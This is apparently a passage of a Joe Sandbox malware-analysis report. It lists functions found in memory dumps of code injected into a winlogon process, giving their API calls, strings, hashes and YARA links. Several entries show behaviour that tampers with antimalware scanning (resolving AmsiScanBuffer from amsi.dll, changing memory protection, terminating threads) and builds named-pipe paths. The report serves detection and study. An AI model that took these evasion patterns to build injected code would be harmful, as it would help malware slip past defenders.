Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 99b476646367142c0c6fda76bf2fa58fbeafd75e846749b42848e904e3af0d9c
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 35011B31724A81C6EB14DB12E85879EB3A2FB88FC0F4841369E5E43754DE3CC985C740

Function 000001E8589B3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E8589B3AAC), ref: 000001E8589B3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589B3AAC), ref: 000001E8589B3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589B3AAC), ref: 000001E8589B3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589B3AAC), ref: 000001E8589B3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589B3AAC), ref: 000001E8589B3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001E8589B3AAC), ref: 000001E8589B3EAE

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: ec5cbc5b675887a2cd19e28577ba679cdf099cfa3344ac30a406abee5d9e5dd1
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 8A011775226B80C6FB24DB61E84879DB7A0BF48B85F04043ACE4E463A5EF3EC4488B04

Function 000001E8589E3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E8589E3AAC), ref: 000001E8589E3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589E3AAC), ref: 000001E8589E3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589E3AAC), ref: 000001E8589E3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E8589E3AAC), ref: 000001E8589E3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E8589E3AAC), ref: 000001E8589E3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001E8589E3AAC), ref: 000001E8589E3EAE

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 2f9c0cfc51ba5fd5bdfcf4159f9d96f753f0c205f48075ef7ae6cf098a274bc4
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: D7010075621780C3FB299B61E898B9DB7A0BF44B45F18043ADE4E067A4EF3DC458C745

Function 000001E858983E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001E858983AAC), ref: 000001E858983E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983AAC), ref: 000001E858983E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E858983AAC), ref: 000001E858983E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001E858983AAC), ref: 000001E858983E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001E858983AAC), ref: 000001E858983E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001E858983AAC), ref: 000001E858983EAE

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: c634941e9789a9e5c594aaa3ca5c4c5b57d3c5671edd2915774813aec4832e90
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: D0012975221B80C3FB249B21E85979EB3A1BF48B85F04003ACE4E063A5EF3DC548CB00

Function 000001E8589E8090 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001E8589E80BC
GetCurrentThreadId.KERNEL32 ref: 000001E8589E80CA
GetCurrentProcessId.KERNEL32 ref: 000001E8589E80D6
QueryPerformanceCounter.KERNEL32 ref: 000001E8589E80E6

Strings

!-M, xrefs: 000001E8589E809D

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID: !-M
API String ID: 2933794660-3625753649
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: f64786db3d27afa61429b3e35815fb64fae8c303434e7dabffc6042b3af8178e
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 7C11D636761B44CAEB008F60E8953E973A4FB59758F441A26EE6D867A4EF78C1548340

Function 000001E8589B1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001E8589B1AF4
StrCmpNIW.SHLWAPI ref: 000001E8589B1B0E
lstrlenW.KERNEL32 ref: 000001E8589B1B1D
StrCpyW.SHLWAPI ref: 000001E8589B1B32

Strings

\\?\, xrefs: 000001E8589B1B02

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: c6fbde9c69c35a39da949cfd57bc54b20fb5d5cea942bf9e48fea89f1c2815cc
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: C9F03C723246C5D2EB209B21F98839DB761FB84B89F8440329E4D86958DE6DC689CB00

Function 000001E8589E1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001E8589E1AF4
StrCmpNIW.SHLWAPI ref: 000001E8589E1B0E
lstrlenW.KERNEL32 ref: 000001E8589E1B1D
StrCpyW.SHLWAPI ref: 000001E8589E1B32

Strings

\\?\, xrefs: 000001E8589E1B02

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: a02c39475f3aef5e4f6d2f64f2629c219650c9661f76a054cee3dc0a61cf8639
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: E9F04F723246C5D2EB209B25F9C439DF761FB84B89F888033DE4D46959DEACC698CB00

Function 000001E858981AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001E858981AF4
StrCmpNIW.SHLWAPI ref: 000001E858981B0E
lstrlenW.KERNEL32 ref: 000001E858981B1D
StrCpyW.SHLWAPI ref: 000001E858981B32

Strings

\\?\, xrefs: 000001E858981B02

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: d1ab4dfb3c9d27a6a7968ceeb6105a01d440b9fb3452b37df00ce152cce2d918
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 08F03C723246C5D2EB209B21F99439EB362FB84B88FC441369E4D46958EE6CC698CB00

Function 000001E8589BB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001E8589BB929
GetProcAddress.KERNEL32 ref: 000001E8589BB93F
FreeLibrary.KERNEL32 ref: 000001E8589BB95B

Strings

CorExitProcess, xrefs: 000001E8589BB938
mscoree.dll, xrefs: 000001E8589BB920

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 623c3f0f95c557c4f792dfa4a5f530112727b10765cff5c8b925d725715220c7
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 9DF06D71224B81C5FB109B24E8983ADB760BF897A5F94063A9E6E451E4CF29C448C200

Function 000001E8589B3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001E8589B275A), ref: 000001E8589B372A
StrCpyW.SHLWAPI ref: 000001E8589B373A
StrCatW.SHLWAPI ref: 000001E8589B3746
PathCombineW.SHLWAPI(?,?,00000000,000001E8589B275A), ref: 000001E8589B3754

Strings

\\.\pipe\, xrefs: 000001E8589B3720

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 19721f659298e70316365141a92f13f9d84cdd604a3c9790b0bb46672ba03d0a
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: FFF0D474628BC0C2EB549B12F95829EBB61BF48FC5F889032EE5E47B59DE6CC446C600

Function 000001E8589EB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001E8589EB929
GetProcAddress.KERNEL32 ref: 000001E8589EB93F
FreeLibrary.KERNEL32 ref: 000001E8589EB95B

Strings

CorExitProcess, xrefs: 000001E8589EB938
mscoree.dll, xrefs: 000001E8589EB920

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: aab2f137679bc762802ead754d232dc4d9b421bf514de914cfdf248a393e817b
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 6EF09071221781C2FB199B24E8843EDB720EF897A4F58033ADE6E451E4CF2CC448C300

Function 000001E8589E3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001E8589E275A), ref: 000001E8589E372A
StrCpyW.SHLWAPI ref: 000001E8589E373A
StrCatW.SHLWAPI ref: 000001E8589E3746
PathCombineW.SHLWAPI(?,?,00000000,000001E8589E275A), ref: 000001E8589E3754

Strings

\\.\pipe\, xrefs: 000001E8589E3720

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 2c7e626d0cd91d46b9ac582cedb05060adeea54e096e85cd6848d24821f55007
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 16F05874724BC0C2EB198B16F99419DFA61AF48FC4F488032EE4E47B18CEA8C455C700

Function 000001E85898B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001E85898B929
GetProcAddress.KERNEL32 ref: 000001E85898B93F
FreeLibrary.KERNEL32 ref: 000001E85898B95B

Strings

mscoree.dll, xrefs: 000001E85898B920
CorExitProcess, xrefs: 000001E85898B938

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 248fa20dc5e5731d0a45531c9fc02e3cf2116f6a823abd7b6d22970c9a0795b1
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 9FF03A71225B82C1FB149B24E8953AEB361EF897A4F98063ADE6E465E4DF2DC449C700

Function 000001E858983708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001E85898275A), ref: 000001E85898372A
StrCpyW.SHLWAPI ref: 000001E85898373A
StrCatW.SHLWAPI ref: 000001E858983746
PathCombineW.SHLWAPI(?,?,00000000,000001E85898275A), ref: 000001E858983754

Strings

\\.\pipe\, xrefs: 000001E858983720

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 6a5f03583955f5ac3b62c5336c9814536ee6e00dbb4c061b133e4b297d55b5e1
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: FDF03474224BC1D2EA148B22F9141AEB362AF48FC4F888032EE0E47B18CE28C445C600

Function 000001E8589B1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001E8589B1E47
GetProcAddress.KERNEL32 ref: 000001E8589B1E57
Sleep.KERNEL32 ref: 000001E8589B1E67

Strings

AmsiScanBuffer, xrefs: 000001E8589B1E50
amsi.dll, xrefs: 000001E8589B1E40

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 4c24b7813e7dbf569234149e9e23c0d50a4987cd2f51bf90a48020a53b489a7a
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 00D06730676A80DAEB08BB11EC593ECBB61BF64B01FC40437CD0E452A0DE2E855A8350

Function 000001E8589E1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001E8589E1E47
GetProcAddress.KERNEL32 ref: 000001E8589E1E57
Sleep.KERNEL32 ref: 000001E8589E1E67

Strings

amsi.dll, xrefs: 000001E8589E1E40
AmsiScanBuffer, xrefs: 000001E8589E1E50

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: b075b644ca28e85cf18d862439597091811fc2f830510fb9260ce46a939d10b5
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 1AD06730732680D6EA0E7B11EC957DCB661AF64B02FD5443BDD0E052A4DE2C89698340

Function 000001E8589B5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589B5896

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 660dd2d31926f5b18437a79e6133f597c173c08b53623139616d374135ae0f44
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 2502963622DBC4CAEB608B55E49439EB7A1F7C4795F104126EA8E87BA9DF7CC454CB00

Function 000001E8589E5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589E5896

Memory Dump Source

